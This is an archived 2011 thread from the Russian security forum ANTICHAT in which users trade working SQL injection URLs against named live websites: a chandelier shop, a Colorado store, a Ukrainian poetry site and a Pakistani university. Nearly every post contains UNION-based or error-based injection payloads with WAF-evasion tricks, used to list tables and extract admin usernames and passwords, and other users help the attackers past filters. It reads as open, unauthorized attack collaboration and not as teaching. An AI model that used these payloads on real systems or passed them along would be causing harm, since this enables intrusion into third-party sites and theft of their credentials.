ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
27.11.2011, 22:50
|
|
Guest
Сообщений: n/a
Провел на форуме:
40748
Репутация:
78
|
|
Сообщение от lightangel
lightangel said:
Site has 34 tables, I found out doing this.
Код:
Code:
http://bohemianchandeliers.co.uk/prod_detail.php?id=14&cat=-1%27+union+select+1,2,3,4,unhex(hex(table_name)),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables+limit+33,1--+3
How do I get an info of a particular table? Это русскоязычный форум. Используй переводчики.
По теме — полный FAQ
|
|
|
|
27.11.2011, 22:56
|
|
Guest
Сообщений: n/a
Провел на форуме:
35174
Репутация:
-6
|
|
Thank you so much.
I've learnt it now.
Need a little help here.
Код:
Code:
http://www.shopoldcoloradocity.com/content.php?id=-97/**/union/**/select/**/1,2,3,4,version(),6,7,8,9,10,11,12--
How to get tables, columns and data? |
|
|
|
27.11.2011, 23:37
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906
Репутация:
-14
|
|
lightangel
There are tables
Код:
Code:
http://www.shopoldcoloradocity.com/content.php?id=-1%27/*--*/UnIoN/*--*/SeLeCt/*--*/1,2,3,4,group_concat%28TABLE_NAME%29,6,7,8,9,10,11,12/*--*/FrOm/*--*/INFORMATION_SCHEMA.TABLES--
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]Admins[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]access[/COLOR][/COLOR]
|
|
|
28.11.2011, 01:16
|
|
Guest
Сообщений: n/a
Провел на форуме:
35174
Репутация:
-6
|
|
Aydin-ka, thanks a lot.
Код:
Code:
http://www.shopoldcoloradocity.com/content.php?id=-1%27/**/UnIoN/**/SeLeCt/**/1,2,3,4,group_concat(TABLE_NAME),6,7,8,9,10,11,12/**/FrOm/**/INFORMATION_SCHEMA.TABLES--
It's a basic WAF..
I've got the tables and columns and now I try this.
Код:
Code:
http://www.shopoldcoloradocity.com/content.php?id=-1%27/**/UnIoN/**/SeLeCt/**/1,2,3,4,group_concat(Name,0x3a,Password),6,7,8,9,10,11,12/**/FrOm/**/Admins--
Any solution? |
|
|
|
28.11.2011, 01:22
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401
Репутация:
0
|
|
Сообщение от lightangel
lightangel said:
Aydin-ka, thanks a lot.
Код:
Code:
http://www.shopoldcoloradocity.com/content.php?id=-1%27/**/UnIoN/**/SeLeCt/**/1,2,3,4,group_concat(TABLE_NAME),6,7,8,9,10,11,12/**/FrOm/**/INFORMATION_SCHEMA.TABLES--
It's a basic WAF..
I've got the tables and columns and now I try this.
Код:
Code:
http://www.shopoldcoloradocity.com/content.php?id=-1%27/**/UnIoN/**/SeLeCt/**/1,2,3,4,group_concat(Name,0x3a,Password),6,7,8,9,10,11,12/**/FrOm/**/Admins--
Any solution? table in other db.
http://www.shopoldcoloradocity.com/content.php?id=-1/**/UnIoN/**/SeLeCt/**/1,2,3,4,concat(Name,0x3a,Password),6,7,8,9,10,11,1 2/**/FrOm/**/dolphin_eval.Admins
|
|
|
|
28.11.2011, 01:37
|
|
Guest
Сообщений: n/a
Провел на форуме:
183267
Репутация:
84
|
|
http://www.poetryclub.com.ua/contest.php?id=29%27+/*!union*/+/*!select*/+1,2,3,4,5+--+
Фильтр юнион...
|
|
|
|
28.11.2011, 02:00
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401
Репутация:
0
|
|
Сообщение от shadowrun
shadowrun said:
http://www.poetryclub.com.ua/contest.php?id=29%27+/*!union*/+/*!select*/+1,2,3,4,5+--+
Фильтр юнион...
избавиться от union можно с помощью error based например.
Код HTML:
HTML:
http://www.poetryclub.com.ua/contest.php?id=29+or+1+group+by+concat((select+concat(login,0x3a,password)+from+admins),floor(rand(0)*2))having+min(0)--
|
|
|
|
28.11.2011, 02:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
35174
Репутация:
-6
|
|
I have a little problem here.
Код:
Code:
http://www.mul.edu.pk/home_old/index.php?id=39+order+by+20--
Shows 20 strings, now to get union select
Код:
Code:
http://www.mul.edu.pk/home_old/index.php?id=39+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
Shows this error
Код:
Code:
Not Acceptable
An appropriate representation of the requested resource /home_old/index.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Код:
Code:
http://www.mul.edu.pk/home_old/index.php?id=39/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
The same error? Why this? |
|
|
|
28.11.2011, 02:35
|
|
Guest
Сообщений: n/a
Провел на форуме:
35174
Репутация:
-6
|
|
Что вы подразумеваете под этим?
|
|
|
|
28.11.2011, 02:38
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401
Репутация:
0
|
|
Сообщение от lightangel
lightangel said:
Что вы подразумеваете под этим?
во как)
значит в состоянии читать по русски.
http://www.ptsecurity.ru/download/PT-devteev-CC-WAF.pdf
а на этом сайте блокируется ип после нескольких запросов, поэтому заморачиваться с проксями не хочется. good luck.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
